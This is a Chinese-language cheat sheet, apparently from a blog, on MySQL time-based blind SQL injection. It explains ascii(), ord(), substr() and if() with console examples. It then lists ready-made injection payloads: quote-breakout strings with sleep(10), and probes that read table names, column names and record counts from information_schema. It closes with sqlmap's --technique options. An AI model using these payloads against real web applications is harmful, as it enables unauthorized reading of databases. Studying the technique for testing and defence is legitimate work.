mysql ord()和ascii()

if(ascii(substr((‘str’),pos,len)),sleep(5),1)**

if(ascii(substr((‘str’),pos,len)),sleep(5),1)**

# 0x00 语句

if(ascii(substr((‘str’),pos,len)),sleep(5),1)

## ASCII(str1)

返回字符串的最左面字符串的ASCII代码值。如果str是空字符串,返回0。如果str是NULL,返回NULL。

1
2
3
4
5
6
7
mysql> select ascii('hi');
+-------------+
| ascii('hi') |
+-------------+
| 104 |
+-------------+
1 row in set (0.00 sec)
1
2
3
4
5
6
7
mysql> SELECT ASCII('b')AS Lower_Case, ASCII('B') AS Upper_Case;
+------------+------------+
| Lower_Case | Upper_Case |
+------------+------------+
| 98 | 66 |
+------------+------------+
1 row in set (0.00 sec)

## ord(str)

ord()函数返回字符串第一个字符的ASCII值。

1
2
3
4
5
6
7
mysql> select ord('h');
+----------+
| ord('h') |
+----------+
| 104 |
+----------+
1 row in set (0.00 sec)

## substr()

substr()函数用来截取数据库中的某一列字段中的一部分。

substr(str,pos,len);

1
2
3
4
5
6
7
mysql> select substr(('Courtney'),1,9);
+--------------------------+
| substr(('Courtney'),1,9) |
+--------------------------+
| Courtney |
+--------------------------+
1 row in set (0.00 sec)

## if()函数

表达式为:if(expr1,expr2,expr3)

  • 如果expr1的值为true,则返回expr2的值;
  • 如果expr1的值为false,则返回expr3的值;
1
2
3
4
5
6
7
mysql> select if(ascii(substr(('L'),1,1))=0,1,sleep(3));
+-------------------------------------------+
| if(ascii(substr(('L'),1,1))=0,1,sleep(3)) |
+-------------------------------------------+
| 0 |
+-------------------------------------------+
1 row in set (3.00 sec)

## 0x01 其他常用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
' and if(1=0,1, sleep(10)) --+    
" and if(1=0,1, sleep(10)) --+
) and if(1=0,1, sleep(10)) --+
') and if(1=0,1, sleep(10)) --+
") and if(1=0,1, sleep(10)) --+
If(ascii(substr(database(),1,1))=115,sleep(10),1)

获取数据库表信息
and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>60 %23
获取列信息
and (select length(column_name) from information_schema.columns where table_name=0x656d61696c73 limit 0,1)>[num] %23
获取字段名
and ascii(substr((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1),1,1))>60 %23
获取当前记录的长度
and (select count(*) from emails)>0 %2

## 0x03 sqlmap technique

1
2
3
4
5
6
7
8
9
10
11
参数:--technique

这个参数可以指定sqlmap使用的探测技术,默认情况下会测试所有的方式。

支持的探测方式如下:

B: Boolean-based blind SQL injection(布尔型注入)
E: Error-based SQL injection(报错型注入)
U: UNION query SQL injection(可联合查询注入)
S: Stacked queries SQL injection(可多语句查询注入)
T: Time-based blind SQL injection(基于时间延迟注入)